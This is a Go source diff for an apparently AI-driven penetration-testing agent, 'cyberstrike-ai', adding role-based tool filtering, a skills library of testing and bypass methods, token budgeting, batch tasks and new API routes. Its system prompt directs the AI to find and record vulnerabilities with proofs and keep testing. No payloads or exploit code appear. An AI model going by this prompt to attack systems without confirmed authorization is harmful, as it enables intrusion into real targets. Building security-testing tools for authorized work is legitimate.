|
||||
调用工具前,在消息内容中提供5-10句话(50-150字)的思考,包含:
|
||||
1. 当前测试目标和工具选择原因
|
||||
2. 基于之前结果的上下文关联
|
||||
3. 期望获得的测试结果
|
||||
|
||||
要求:
|
||||
- ✅ 2-4句话清晰表达
|
||||
- ✅ 包含关键决策依据
|
||||
- ❌ 不要只写一句话
|
||||
- ❌ 不要超过10句话
|
||||
|
||||
重要:当工具调用失败时,请遵循以下原则:
|
||||
1. 仔细分析错误信息,理解失败的具体原因
|
||||
@@ -401,8 +414,8 @@ func (a *Agent) AgentLoopWithProgress(ctx context.Context, userInput string, his
|
||||
当工具返回错误时,错误信息会包含在工具响应中,请仔细阅读并做出合理的决策。
|
||||
|
||||
漏洞记录要求:
|
||||
- 当你发现有效漏洞时,必须使用 record_vulnerability 工具记录漏洞详情
|
||||
- 漏洞记录应包含:标题、描述、严重程度、类型、目标、证明(POC)、影响和修复建议
|
||||
- 当你发现有效漏洞时,必须使用 ` + builtin.ToolRecordVulnerability + ` 工具记录漏洞详情
|
||||
` + `- 漏洞记录应包含:标题、描述、严重程度、类型、目标、证明(POC)、影响和修复建议
|
||||
- 严重程度评估标准:
|
||||
* critical(严重):可导致系统完全被控制、数据泄露、服务中断等
|
||||
* high(高):可导致敏感信息泄露、权限提升、重要功能被绕过等
|
||||
@@ -410,7 +423,45 @@ func (a *Agent) AgentLoopWithProgress(ctx context.Context, userInput string, his
|
||||
* low(低):影响较小,难以利用或影响范围有限
|
||||
* info(信息):安全配置问题、信息泄露但不直接可利用等
|
||||
- 确保漏洞证明(proof)包含足够的证据,如请求/响应、截图、命令输出等
|
||||
- 在记录漏洞后,继续测试以发现更多问题`
|
||||
- 在记录漏洞后,继续测试以发现更多问题
|
||||
|
||||
技能库(Skills):
|
||||
- 系统提供了技能库(Skills),包含各种安全测试的专业技能和方法论文档
|
||||
- 技能库与知识库的区别:
|
||||
* 知识库(Knowledge Base):用于检索分散的知识片段,适合快速查找特定信息
|
||||
* 技能库(Skills):包含完整的专业技能文档,适合深入学习某个领域的测试方法、工具使用、绕过技巧等
|
||||
- 当你需要特定领域的专业技能时,可以使用以下工具按需获取:
|
||||
* ` + builtin.ToolListSkills + `: 获取所有可用的skills列表,查看有哪些专业技能可用
|
||||
* ` + builtin.ToolReadSkill + `: 读取指定skill的详细内容,获取该领域的专业技能文档
|
||||
- 建议在执行相关任务前,先使用 ` + builtin.ToolListSkills + ` 查看可用skills,然后根据任务需要调用 ` + builtin.ToolReadSkill + ` 获取相关专业技能
|
||||
- 例如:如果需要测试SQL注入,可以先调用 ` + builtin.ToolListSkills + ` 查看是否有sql-injection相关的skill,然后调用 ` + builtin.ToolReadSkill + ` 读取该skill的内容
|
||||
- Skills内容包含完整的测试方法、工具使用、绕过技巧、最佳实践等专业技能文档,可以帮助你更专业地执行任务`
|
||||
|
||||
// 如果角色配置了skills,在系统提示词中提示AI(但不硬编码内容)
|
||||
if len(roleSkills) > 0 {
|
||||
var skillsHint strings.Builder
|
||||
skillsHint.WriteString("\n\n本角色推荐使用的Skills:\n")
|
||||
for i, skillName := range roleSkills {
|
||||
if i > 0 {
|
||||
skillsHint.WriteString("、")
|
||||
}
|
||||
skillsHint.WriteString("`")
|
||||
skillsHint.WriteString(skillName)
|
||||
skillsHint.WriteString("`")
|
||||
}
|
||||
skillsHint.WriteString("\n- 这些skills包含了与本角色相关的专业技能文档,建议在执行相关任务时使用 `")
|
||||
skillsHint.WriteString(builtin.ToolReadSkill)
|
||||
skillsHint.WriteString("` 工具读取这些skills的内容")
|
||||
skillsHint.WriteString("\n- 例如:`")
|
||||
skillsHint.WriteString(builtin.ToolReadSkill)
|
||||
skillsHint.WriteString("(skill_name=\"")
|
||||
skillsHint.WriteString(roleSkills[0])
|
||||
skillsHint.WriteString("\")` 可以读取第一个推荐skill的内容")
|
||||
skillsHint.WriteString("\n- 注意:这些skills的内容不会自动注入,需要你根据任务需要主动调用 `")
|
||||
skillsHint.WriteString(builtin.ToolReadSkill)
|
||||
skillsHint.WriteString("` 工具获取")
|
||||
systemPrompt += skillsHint.String()
|
||||
}
|
||||
|
||||
messages := []ChatMessage{
|
||||
{
|
||||
@@ -478,8 +529,10 @@ func (a *Agent) AgentLoopWithProgress(ctx context.Context, userInput string, his
|
||||
|
||||
maxIterations := a.maxIterations
|
||||
for i := 0; i < maxIterations; i++ {
|
||||
// 每轮调用前先尝试压缩,防止历史消息持续膨胀
|
||||
messages = a.applyMemoryCompression(ctx, messages)
|
||||
// 先获取本轮可用工具并统计 tools token,再压缩,以便压缩时预留 tools 占用的空间
|
||||
tools := a.getAvailableTools(roleTools)
|
||||
toolsTokens := a.countToolsTokens(tools)
|
||||
messages = a.applyMemoryCompression(ctx, messages, toolsTokens)
|
||||
|
||||
// 检查是否是最后一次迭代
|
||||
isLastIteration := (i == maxIterations-1)
|
||||
@@ -511,17 +564,17 @@ func (a *Agent) AgentLoopWithProgress(ctx context.Context, userInput string, his
|
||||
default:
|
||||
}
|
||||
|
||||
// 获取可用工具
|
||||
tools := a.getAvailableTools()
|
||||
|
||||
// 记录当前上下文的Token用量,展示压缩器运行状态
|
||||
// 记录当前上下文的 Token 用量(messages + tools),展示压缩器运行状态
|
||||
if a.memoryCompressor != nil {
|
||||
totalTokens, systemCount, regularCount := a.memoryCompressor.totalTokensFor(messages)
|
||||
messagesTokens, systemCount, regularCount := a.memoryCompressor.totalTokensFor(messages)
|
||||
totalTokens := messagesTokens + toolsTokens
|
||||
a.logger.Info("memory compressor context stats",
|
||||
zap.Int("iteration", i+1),
|
||||
zap.Int("messagesCount", len(messages)),
|
||||
zap.Int("systemMessages", systemCount),
|
||||
zap.Int("regularMessages", regularCount),
|
||||
zap.Int("messagesTokens", messagesTokens),
|
||||
zap.Int("toolsTokens", toolsTokens),
|
||||
zap.Int("totalTokens", totalTokens),
|
||||
zap.Int("maxTotalTokens", a.memoryCompressor.maxTotalTokens),
|
||||
)
|
||||
@@ -737,7 +790,7 @@ func (a *Agent) AgentLoopWithProgress(ctx context.Context, userInput string, his
|
||||
Role: "user",
|
||||
Content: "这是最后一次迭代。请总结到目前为止的所有测试结果、发现的问题和已完成的工作。如果需要继续测试,请提供详细的下一步执行计划。请直接回复,不要调用工具。",
|
||||
})
|
||||
messages = a.applyMemoryCompression(ctx, messages)
|
||||
messages = a.applyMemoryCompression(ctx, messages, 0) // 总结时不带 tools,不预留
|
||||
// 立即调用OpenAI获取总结
|
||||
summaryResponse, err := a.callOpenAI(ctx, messages, []Tool{}) // 不提供工具,强制AI直接回复
|
||||
if err == nil && summaryResponse != nil && len(summaryResponse.Choices) > 0 {
|
||||
@@ -777,7 +830,7 @@ func (a *Agent) AgentLoopWithProgress(ctx context.Context, userInput string, his
|
||||
Role: "user",
|
||||
Content: "这是最后一次迭代。请总结到目前为止的所有测试结果、发现的问题和已完成的工作。如果需要继续测试,请提供详细的下一步执行计划。请直接回复,不要调用工具。",
|
||||
})
|
||||
messages = a.applyMemoryCompression(ctx, messages)
|
||||
messages = a.applyMemoryCompression(ctx, messages, 0) // 总结时不带 tools,不预留
|
||||
// 立即调用OpenAI获取总结
|
||||
summaryResponse, err := a.callOpenAI(ctx, messages, []Tool{}) // 不提供工具,强制AI直接回复
|
||||
if err == nil && summaryResponse != nil && len(summaryResponse.Choices) > 0 {
|
||||
@@ -816,7 +869,7 @@ func (a *Agent) AgentLoopWithProgress(ctx context.Context, userInput string, his
|
||||
Content: fmt.Sprintf("已达到最大迭代次数(%d轮)。请总结到目前为止的所有测试结果、发现的问题和已完成的工作。如果需要继续测试,请提供详细的下一步执行计划。请直接回复,不要调用工具。", a.maxIterations),
|
||||
}
|
||||
messages = append(messages, finalSummaryPrompt)
|
||||
messages = a.applyMemoryCompression(ctx, messages)
|
||||
messages = a.applyMemoryCompression(ctx, messages, 0) // 总结时不带 tools,不预留
|
||||
|
||||
summaryResponse, err := a.callOpenAI(ctx, messages, []Tool{}) // 不提供工具,强制AI直接回复
|
||||
if err == nil && summaryResponse != nil && len(summaryResponse.Choices) > 0 {
|
||||
@@ -837,13 +890,29 @@ func (a *Agent) AgentLoopWithProgress(ctx context.Context, userInput string, his
|
||||
|
||||
// getAvailableTools 获取可用工具
|
||||
// 从MCP服务器动态获取工具列表,使用简短描述以减少token消耗
|
||||
func (a *Agent) getAvailableTools() []Tool {
|
||||
// roleTools: 角色配置的工具列表(toolKey格式),如果为空或nil,则使用所有工具(默认角色)
|
||||
func (a *Agent) getAvailableTools(roleTools []string) []Tool {
|
||||
// 构建角色工具集合(用于快速查找)
|
||||
roleToolSet := make(map[string]bool)
|
||||
if len(roleTools) > 0 {
|
||||
for _, toolKey := range roleTools {
|
||||
roleToolSet[toolKey] = true
|
||||
}
|
||||
}
|
||||
|
||||
// 从MCP服务器获取所有已注册的内部工具
|
||||
mcpTools := a.mcpServer.GetAllTools()
|
||||
|
||||
// 转换为OpenAI格式的工具定义
|
||||
tools := make([]Tool, 0, len(mcpTools))
|
||||
for _, mcpTool := range mcpTools {
|
||||
// 如果指定了角色工具列表,只添加在列表中的工具
|
||||
if len(roleToolSet) > 0 {
|
||||
toolKey := mcpTool.Name // 内置工具使用工具名称作为key
|
||||
if !roleToolSet[toolKey] {
|
||||
continue // 不在角色工具列表中,跳过
|
||||
}
|
||||
}
|
||||
// 使用简短描述(如果存在),否则使用详细描述
|
||||
description := mcpTool.ShortDescription
|
||||
if description == "" {
|
||||
@@ -865,7 +934,8 @@ func (a *Agent) getAvailableTools() []Tool {
|
||||
|
||||
// 获取外部MCP工具
|
||||
if a.externalMCPMgr != nil {
|
||||
ctx, cancel := context.WithTimeout(context.Background(), 10*time.Second)
|
||||
// 增加超时时间到30秒,因为通过代理连接远程服务器可能需要更长时间
|
||||
ctx, cancel := context.WithTimeout(context.Background(), 30*time.Second)
|
||||
defer cancel()
|
||||
|
||||
externalTools, err := a.externalMCPMgr.GetAllTools(ctx)
|
||||
@@ -882,6 +952,16 @@ func (a *Agent) getAvailableTools() []Tool {
|
||||
|
||||
// 将外部MCP工具添加到工具列表(只添加启用的工具)
|
||||
for _, externalTool := range externalTools {
|
||||
// 外部工具使用 "mcpName::toolName" 作为toolKey
|
||||
externalToolKey := externalTool.Name
|
||||
|
||||
// 如果指定了角色工具列表,只添加在列表中的工具
|
||||
if len(roleToolSet) > 0 {
|
||||
if !roleToolSet[externalToolKey] {
|
||||
continue // 不在角色工具列表中,跳过
|
||||
}
|
||||
}
|
||||
|
||||
// 解析工具名称:mcpName::toolName
|
||||
var mcpName, actualToolName string
|
||||
if idx := strings.Index(externalTool.Name, "::"); idx > 0 {
|
||||
@@ -1135,7 +1215,7 @@ func (a *Agent) executeToolViaMCP(ctx context.Context, toolName string, args map
|
||||
)
|
||||
|
||||
// 如果是record_vulnerability工具,自动添加conversation_id
|
||||
if toolName == "record_vulnerability" {
|
||||
if toolName == builtin.ToolRecordVulnerability {
|
||||
a.mu.RLock()
|
||||
conversationID := a.currentConversationID
|
||||
a.mu.RUnlock()
|
||||
@@ -1347,13 +1427,13 @@ func (a *Agent) formatToolError(toolName string, args map[string]interface{}, er
|
||||
return errorMsg
|
||||
}
|
||||
|
||||
// applyMemoryCompression 在调用LLM前对消息进行压缩,避免超过token限制
|
||||
func (a *Agent) applyMemoryCompression(ctx context.Context, messages []ChatMessage) []ChatMessage {
|
||||
// applyMemoryCompression 在调用LLM前对消息进行压缩,避免超过 token 限制。reservedTokens 为预留给 tools 的 token 数,传 0 表示不预留。
|
||||
func (a *Agent) applyMemoryCompression(ctx context.Context, messages []ChatMessage, reservedTokens int) []ChatMessage {
|
||||
if a.memoryCompressor == nil {
|
||||
return messages
|
||||
}
|
||||
|
||||
compressed, changed, err := a.memoryCompressor.CompressHistory(ctx, messages)
|
||||
compressed, changed, err := a.memoryCompressor.CompressHistory(ctx, messages, reservedTokens)
|
||||
if err != nil {
|
||||
a.logger.Warn("上下文压缩失败,将使用原始消息继续", zap.Error(err))
|
||||
return messages
|
||||
@@ -1369,6 +1449,18 @@ func (a *Agent) applyMemoryCompression(ctx context.Context, messages []ChatMessa
|
||||
return messages
|
||||
}
|
||||
|
||||
// countToolsTokens 统计 tools 序列化后的 token 数,用于日志与压缩时预留空间。mc 为 nil 时返回 0。
|
||||
func (a *Agent) countToolsTokens(tools []Tool) int {
|
||||
if len(tools) == 0 || a.memoryCompressor == nil {
|
||||
return 0
|
||||
}
|
||||
data, err := json.Marshal(tools)
|
||||
if err != nil {
|
||||
return 0
|
||||
}
|
||||
return a.memoryCompressor.CountTextTokens(string(data))
|
||||
}
|
||||
|
||||
// handleMissingToolError 当LLM调用不存在的工具时,向其追加提示消息并允许继续迭代
|
||||
func (a *Agent) handleMissingToolError(errMsg string, messages *[]ChatMessage) (bool, string) {
|
||||
lowerMsg := strings.ToLower(errMsg)
|
||||
|
||||
@@ -158,8 +158,8 @@ func (mc *MemoryCompressor) UpdateConfig(cfg *config.OpenAIConfig) {
|
||||
}
|
||||
}
|
||||
|
||||
// CompressHistory 根据Token限制压缩历史消息。
|
||||
func (mc *MemoryCompressor) CompressHistory(ctx context.Context, messages []ChatMessage) ([]ChatMessage, bool, error) {
|
||||
// CompressHistory 根据 Token 限制压缩历史消息。reservedTokens 为预留给 tools 等非消息内容的 token 数,压缩时使用 (maxTotalTokens - reservedTokens) 作为消息上限。
|
||||
func (mc *MemoryCompressor) CompressHistory(ctx context.Context, messages []ChatMessage, reservedTokens int) ([]ChatMessage, bool, error) {
|
||||
if len(messages) == 0 {
|
||||
return messages, false, nil
|
||||
}
|
||||
@@ -171,8 +171,13 @@ func (mc *MemoryCompressor) CompressHistory(ctx context.Context, messages []Chat
|
||||
return messages, false, nil
|
||||
}
|
||||
|
||||
effectiveMax := mc.maxTotalTokens
|
||||
if reservedTokens > 0 && reservedTokens < mc.maxTotalTokens {
|
||||
effectiveMax = mc.maxTotalTokens - reservedTokens
|
||||
}
|
||||
|
||||
totalTokens := mc.countTotalTokens(systemMsgs, regularMsgs)
|
||||
if totalTokens <= int(float64(mc.maxTotalTokens)*0.9) {
|
||||
if totalTokens <= int(float64(effectiveMax)*0.9) {
|
||||
return messages, false, nil
|
||||
}
|
||||
|
||||
@@ -184,6 +189,8 @@ func (mc *MemoryCompressor) CompressHistory(ctx context.Context, messages []Chat
|
||||
mc.logger.Info("memory compression triggered",
|
||||
zap.Int("total_tokens", totalTokens),
|
||||
zap.Int("max_total_tokens", mc.maxTotalTokens),
|
||||
zap.Int("reserved_tokens", reservedTokens),
|
||||
zap.Int("effective_max", effectiveMax),
|
||||
zap.Int("system_messages", len(systemMsgs)),
|
||||
zap.Int("regular_messages", len(regularMsgs)),
|
||||
zap.Int("old_messages", len(oldMsgs)),
|
||||
@@ -282,6 +289,11 @@ func (mc *MemoryCompressor) countTokens(text string) int {
|
||||
return count
|
||||
}
|
||||
|
||||
// CountTextTokens 对外暴露的文本 Token 计数,用于统计 tools 等非消息内容的 token(如 agent 侧序列化 tools 后计数)。
|
||||
func (mc *MemoryCompressor) CountTextTokens(text string) int {
|
||||
return mc.countTokens(text)
|
||||
}
|
||||
|
||||
// totalTokensFor provides token statistics without mutating the message list.
|
||||
func (mc *MemoryCompressor) totalTokensFor(messages []ChatMessage) (totalTokens int, systemCount int, regularCount int) {
|
||||
if len(messages) == 0 {
|
||||
|
||||
@@ -16,8 +16,10 @@ import (
|
||||
"cyberstrike-ai/internal/knowledge"
|
||||
"cyberstrike-ai/internal/logger"
|
||||
"cyberstrike-ai/internal/mcp"
|
||||
"cyberstrike-ai/internal/mcp/builtin"
|
||||
"cyberstrike-ai/internal/openai"
|
||||
"cyberstrike-ai/internal/security"
|
||||
"cyberstrike-ai/internal/skills"
|
||||
"cyberstrike-ai/internal/storage"
|
||||
|
||||
"github.com/gin-gonic/gin"
|
||||
@@ -219,13 +221,43 @@ func New(cfg *config.Config, log *logger.Logger) (*App, error) {
|
||||
if len(itemsToIndex) > 0 {
|
||||
log.Logger.Info("检测到已有知识库索引,开始增量索引", zap.Int("count", len(itemsToIndex)))
|
||||
ctx := context.Background()
|
||||
consecutiveFailures := 0
|
||||
var firstFailureItemID string
|
||||
var firstFailureError error
|
||||
failedCount := 0
|
||||
|
||||
for _, itemID := range itemsToIndex {
|
||||
if err := knowledgeIndexer.IndexItem(ctx, itemID); err != nil {
|
||||
log.Logger.Warn("索引知识项失败", zap.String("itemId", itemID), zap.Error(err))
|
||||
failedCount++
|
||||
consecutiveFailures++
|
||||
|
||||
if consecutiveFailures == 1 {
|
||||
firstFailureItemID = itemID
|
||||
firstFailureError = err
|
||||
log.Logger.Warn("索引知识项失败", zap.String("itemId", itemID), zap.Error(err))
|
||||
}
|
||||
|
||||
// 如果连续失败2次,立即停止增量索引
|
||||
if consecutiveFailures >= 2 {
|
||||
log.Logger.Error("连续索引失败次数过多,立即停止增量索引",
|
||||
zap.Int("consecutiveFailures", consecutiveFailures),
|
||||
zap.Int("totalItems", len(itemsToIndex)),
|
||||
zap.String("firstFailureItemId", firstFailureItemID),
|
||||
zap.Error(firstFailureError),
|
||||
)
|
||||
break
|
||||
}
|
||||
continue
|
||||
}
|
||||
|
||||
// 成功时重置连续失败计数
|
||||
if consecutiveFailures > 0 {
|
||||
consecutiveFailures = 0
|
||||
firstFailureItemID = ""
|
||||
firstFailureError = nil
|
||||
}
|
||||
}
|
||||
log.Logger.Info("增量索引完成", zap.Int("totalItems", len(itemsToIndex)))
|
||||
log.Logger.Info("增量索引完成", zap.Int("totalItems", len(itemsToIndex)), zap.Int("failedCount", failedCount))
|
||||
} else {
|
||||
log.Logger.Info("检测到已有知识库索引,没有需要索引的新项或更新项")
|
||||
}
|
||||
@@ -247,21 +279,53 @@ func New(cfg *config.Config, log *logger.Logger) (*App, error) {
|
||||
configPath = os.Args[1]
|
||||
}
|
||||
|
||||
// 初始化Skills管理器
|
||||
skillsDir := cfg.SkillsDir
|
||||
if skillsDir == "" {
|
||||
skillsDir = "skills" // 默认目录
|
||||
}
|
||||
// 如果是相对路径,相对于配置文件所在目录
|
||||
configDir := filepath.Dir(configPath)
|
||||
if !filepath.IsAbs(skillsDir) {
|
||||
skillsDir = filepath.Join(configDir, skillsDir)
|
||||
}
|
||||
skillsManager := skills.NewManager(skillsDir, log.Logger)
|
||||
log.Logger.Info("Skills管理器已初始化", zap.String("skillsDir", skillsDir))
|
||||
|
||||
// 注册Skills工具到MCP服务器(让AI可以按需调用,带数据库存储支持统计)
|
||||
// 创建一个适配器,将database.DB适配为SkillStatsStorage接口
|
||||
var skillStatsStorage skills.SkillStatsStorage
|
||||
if db != nil {
|
||||
skillStatsStorage = &skillStatsDBAdapter{db: db}
|
||||
}
|
||||
skills.RegisterSkillsToolWithStorage(mcpServer, skillsManager, skillStatsStorage, log.Logger)
|
||||
|
||||
// 创建处理器
|
||||
agentHandler := handler.NewAgentHandler(agent, db, log.Logger)
|
||||
agentHandler := handler.NewAgentHandler(agent, db, cfg, log.Logger)
|
||||
agentHandler.SetSkillsManager(skillsManager) // 设置Skills管理器
|
||||
// 如果知识库已启用,设置知识库管理器到AgentHandler以便记录检索日志
|
||||
if knowledgeManager != nil {
|
||||
agentHandler.SetKnowledgeManager(knowledgeManager)
|
||||
}
|
||||
monitorHandler := handler.NewMonitorHandler(mcpServer, executor, db, log.Logger)
|
||||
monitorHandler.SetExternalMCPManager(externalMCPMgr) // 设置外部MCP管理器,以便获取外部MCP执行记录
|
||||
conversationHandler := handler.NewConversationHandler(db, log.Logger)
|
||||
groupHandler := handler.NewGroupHandler(db, log.Logger)
|
||||
authHandler := handler.NewAuthHandler(authManager, cfg, configPath, log.Logger)
|
||||
attackChainHandler := handler.NewAttackChainHandler(db, &cfg.OpenAI, log.Logger)
|
||||
vulnerabilityHandler := handler.NewVulnerabilityHandler(db, log.Logger)
|
||||
configHandler := handler.NewConfigHandler(configPath, cfg, mcpServer, executor, agent, attackChainHandler, externalMCPMgr, log.Logger)
|
||||
externalMCPHandler := handler.NewExternalMCPHandler(externalMCPMgr, cfg, configPath, log.Logger)
|
||||
roleHandler := handler.NewRoleHandler(cfg, configPath, log.Logger)
|
||||
roleHandler.SetSkillsManager(skillsManager) // 设置Skills管理器到RoleHandler
|
||||
skillsHandler := handler.NewSkillsHandler(skillsManager, cfg, configPath, log.Logger)
|
||||
fofaHandler := handler.NewFofaHandler(cfg, log.Logger)
|
||||
if db != nil {
|
||||
skillsHandler.SetDB(db) // 设置数据库连接以便获取调用统计
|
||||
}
|
||||
|
||||
// 创建OpenAPI处理器
|
||||
conversationHandler := handler.NewConversationHandler(db, log.Logger)
|
||||
openAPIHandler := handler.NewOpenAPIHandler(db, log.Logger, resultStorage, conversationHandler, agentHandler)
|
||||
|
||||
// 创建 App 实例(部分字段稍后填充)
|
||||
app := &App{
|
||||
@@ -289,6 +353,18 @@ func New(cfg *config.Config, log *logger.Logger) (*App, error) {
|
||||
}
|
||||
configHandler.SetVulnerabilityToolRegistrar(vulnerabilityRegistrar)
|
||||
|
||||
// 设置Skills工具注册器(内置工具,必须设置)
|
||||
skillsRegistrar := func() error {
|
||||
// 创建一个适配器,将database.DB适配为SkillStatsStorage接口
|
||||
var skillStatsStorage skills.SkillStatsStorage
|
||||
if db != nil {
|
||||
skillStatsStorage = &skillStatsDBAdapter{db: db}
|
||||
}
|
||||
skills.RegisterSkillsToolWithStorage(mcpServer, skillsManager, skillStatsStorage, log.Logger)
|
||||
return nil
|
||||
}
|
||||
configHandler.SetSkillsToolRegistrar(skillsRegistrar)
|
||||
|
||||
// 设置知识库初始化器(用于动态初始化,需要在 App 创建后设置)
|
||||
configHandler.SetKnowledgeInitializer(func() (*handler.KnowledgeHandler, error) {
|
||||
knowledgeHandler, err := initializeKnowledge(cfg, db, knowledgeDBConn, mcpServer, agentHandler, app, log.Logger)
|
||||
@@ -338,8 +414,12 @@ func New(cfg *config.Config, log *logger.Logger) (*App, error) {
|
||||
attackChainHandler,
|
||||
app, // 传递 App 实例以便动态获取 knowledgeHandler
|
||||
vulnerabilityHandler,
|
||||
roleHandler,
|
||||
skillsHandler,
|
||||
fofaHandler,
|
||||
mcpServer,
|
||||
authManager,
|
||||
openAPIHandler,
|
||||
)
|
||||
|
||||
return app, nil
|
||||
@@ -398,8 +478,12 @@ func setupRoutes(
|
||||
attackChainHandler *handler.AttackChainHandler,
|
||||
app *App, // 传递 App 实例以便动态获取 knowledgeHandler
|
||||
vulnerabilityHandler *handler.VulnerabilityHandler,
|
||||
roleHandler *handler.RoleHandler,
|
||||
skillsHandler *handler.SkillsHandler,
|
||||
fofaHandler *handler.FofaHandler,
|
||||
mcpServer *mcp.Server,
|
||||
authManager *security.AuthManager,
|
||||
openAPIHandler *handler.OpenAPIHandler,
|
||||
) {
|
||||
// API路由
|
||||
api := router.Group("/api")
|
||||
@@ -423,6 +507,21 @@ func setupRoutes(
|
||||
// Agent Loop 取消与任务列表
|
||||
protected.POST("/agent-loop/cancel", agentHandler.CancelAgentLoop)
|
||||
protected.GET("/agent-loop/tasks", agentHandler.ListAgentTasks)
|
||||
protected.GET("/agent-loop/tasks/completed", agentHandler.ListCompletedTasks)
|
||||
|
||||
// 信息收集 - FOFA 查询(后端代理)
|
||||
protected.POST("/fofa/search", fofaHandler.Search)
|
||||
|
||||
// 批量任务管理
|
||||
protected.POST("/batch-tasks", agentHandler.CreateBatchQueue)
|
||||
protected.GET("/batch-tasks", agentHandler.ListBatchQueues)
|
||||
protected.GET("/batch-tasks/:queueId", agentHandler.GetBatchQueue)
|
||||
protected.POST("/batch-tasks/:queueId/start", agentHandler.StartBatchQueue)
|
||||
protected.POST("/batch-tasks/:queueId/pause", agentHandler.PauseBatchQueue)
|
||||
protected.DELETE("/batch-tasks/:queueId", agentHandler.DeleteBatchQueue)
|
||||
protected.PUT("/batch-tasks/:queueId/tasks/:taskId", agentHandler.UpdateBatchTask)
|
||||
protected.POST("/batch-tasks/:queueId/tasks", agentHandler.AddBatchTask)
|
||||
protected.DELETE("/batch-tasks/:queueId/tasks/:taskId", agentHandler.DeleteBatchTask)
|
||||
|
||||
// 对话历史
|
||||
protected.POST("/conversations", conversationHandler.CreateConversation)
|
||||
@@ -448,6 +547,7 @@ func setupRoutes(
|
||||
protected.GET("/monitor", monitorHandler.Monitor)
|
||||
protected.GET("/monitor/execution/:id", monitorHandler.GetExecution)
|
||||
protected.DELETE("/monitor/execution/:id", monitorHandler.DeleteExecution)
|
||||
protected.DELETE("/monitor/executions", monitorHandler.DeleteExecutions)
|
||||
protected.GET("/monitor/stats", monitorHandler.GetStats)
|
||||
|
||||
// 配置管理
|
||||
@@ -600,6 +700,18 @@ func setupRoutes(
|
||||
}
|
||||
app.knowledgeHandler.Search(c)
|
||||
})
|
||||
knowledgeRoutes.GET("/stats", func(c *gin.Context) {
|
||||
if app.knowledgeHandler == nil {
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"enabled": false,
|
||||
"total_categories": 0,
|
||||
"total_items": 0,
|
||||
"message": "知识库功能未启用,请前往系统设置启用知识检索功能",
|
||||
})
|
||||
return
|
||||
}
|
||||
app.knowledgeHandler.GetStats(c)
|
||||
})
|
||||
}
|
||||
|
||||
// 漏洞管理
|
||||
@@ -610,26 +722,60 @@ func setupRoutes(
|
||||
protected.PUT("/vulnerabilities/:id", vulnerabilityHandler.UpdateVulnerability)
|
||||
protected.DELETE("/vulnerabilities/:id", vulnerabilityHandler.DeleteVulnerability)
|
||||
|
||||
// 角色管理
|
||||
protected.GET("/roles", roleHandler.GetRoles)
|
||||
protected.GET("/roles/:name", roleHandler.GetRole)
|
||||
protected.GET("/roles/skills/list", roleHandler.GetSkills)
|
||||
protected.POST("/roles", roleHandler.CreateRole)
|
||||
protected.PUT("/roles/:name", roleHandler.UpdateRole)
|
||||
protected.DELETE("/roles/:name", roleHandler.DeleteRole)
|
||||
|
||||
// Skills管理
|
||||
protected.GET("/skills", skillsHandler.GetSkills)
|
||||
protected.GET("/skills/stats", skillsHandler.GetSkillStats)
|
||||
protected.DELETE("/skills/stats", skillsHandler.ClearSkillStats)
|
||||
protected.GET("/skills/:name", skillsHandler.GetSkill)
|
||||
protected.GET("/skills/:name/bound-roles", skillsHandler.GetSkillBoundRoles)
|
||||
protected.POST("/skills", skillsHandler.CreateSkill)
|
||||
protected.PUT("/skills/:name", skillsHandler.UpdateSkill)
|
||||
protected.DELETE("/skills/:name", skillsHandler.DeleteSkill)
|
||||
protected.DELETE("/skills/:name/stats", skillsHandler.ClearSkillStatsByName)
|
||||
|
||||
// MCP端点
|
||||
protected.POST("/mcp", func(c *gin.Context) {
|
||||
mcpServer.HandleHTTP(c.Writer, c.Request)
|
||||
})
|
||||
|
||||
// OpenAPI结果聚合端点(可选,用于获取对话的完整结果)
|
||||
protected.GET("/conversations/:id/results", openAPIHandler.GetConversationResults)
|
||||
}
|
||||
|
||||
// OpenAPI规范(需要认证,避免暴露API结构信息)
|
||||
protected.GET("/openapi/spec", openAPIHandler.GetOpenAPISpec)
|
||||
|
||||
// API文档页面(公开访问,但需要登录后才能使用API)
|
||||
router.GET("/api-docs", func(c *gin.Context) {
|
||||
c.HTML(http.StatusOK, "api-docs.html", nil)
|
||||
})
|
||||
|
||||
// 静态文件
|
||||
router.Static("/static", "./web/static")
|
||||
router.LoadHTMLGlob("web/templates/*")
|
||||
|
||||
// 前端页面
|
||||
router.GET("/", func(c *gin.Context) {
|
||||
c.HTML(http.StatusOK, "index.html", nil)
|
||||
version := app.config.Version
|
||||
if version == "" {
|
||||
version = "v1.0.0"
|
||||
}
|
||||
c.HTML(http.StatusOK, "index.html", gin.H{"Version": version})
|
||||
})
|
||||
}
|
||||
|
||||
// registerVulnerabilityTool 注册漏洞记录工具到MCP服务器
|
||||
func registerVulnerabilityTool(mcpServer *mcp.Server, db *database.DB, logger *zap.Logger) {
|
||||
tool := mcp.Tool{
|
||||
Name: "record_vulnerability",
|
||||
Name: builtin.ToolRecordVulnerability,
|
||||
Description: "记录发现的漏洞详情到漏洞管理系统。当发现有效漏洞时,使用此工具记录漏洞信息,包括标题、描述、严重程度、类型、目标、证明、影响和建议等。",
|
||||
ShortDescription: "记录发现的漏洞详情到漏洞管理系统",
|
||||
InputSchema: map[string]interface{}{
|
||||
@@ -921,13 +1067,43 @@ func initializeKnowledge(
|
||||
if len(itemsToIndex) > 0 {
|
||||
logger.Info("检测到已有知识库索引,开始增量索引", zap.Int("count", len(itemsToIndex)))
|
||||
ctx := context.Background()
|
||||
consecutiveFailures := 0
|
||||
var firstFailureItemID string
|
||||
var firstFailureError error
|
||||
failedCount := 0
|
||||
|
||||
for _, itemID := range itemsToIndex {
|
||||
if err := knowledgeIndexer.IndexItem(ctx, itemID); err != nil {
|
||||
logger.Warn("索引知识项失败", zap.String("itemId", itemID), zap.Error(err))
|
||||
failedCount++
|
||||
consecutiveFailures++
|
||||
|
||||
if consecutiveFailures == 1 {
|
||||
firstFailureItemID = itemID
|
||||
firstFailureError = err
|
||||
logger.Warn("索引知识项失败", zap.String("itemId", itemID), zap.Error(err))
|
||||
}
|
||||
|
||||
// 如果连续失败2次,立即停止增量索引
|
||||
if consecutiveFailures >= 2 {
|
||||
logger.Error("连续索引失败次数过多,立即停止增量索引",
|
||||
zap.Int("consecutiveFailures", consecutiveFailures),
|
||||
zap.Int("totalItems", len(itemsToIndex)),
|
||||
zap.String("firstFailureItemId", firstFailureItemID),
|
||||
zap.Error(firstFailureError),
|
||||
)
|
||||
break
|
||||
}
|
||||
continue
|
||||
}
|
||||
|
||||
// 成功时重置连续失败计数
|
||||
if consecutiveFailures > 0 {
|
||||
consecutiveFailures = 0
|
||||
firstFailureItemID = ""
|
||||
firstFailureError = nil
|
||||
}
|
||||
}
|
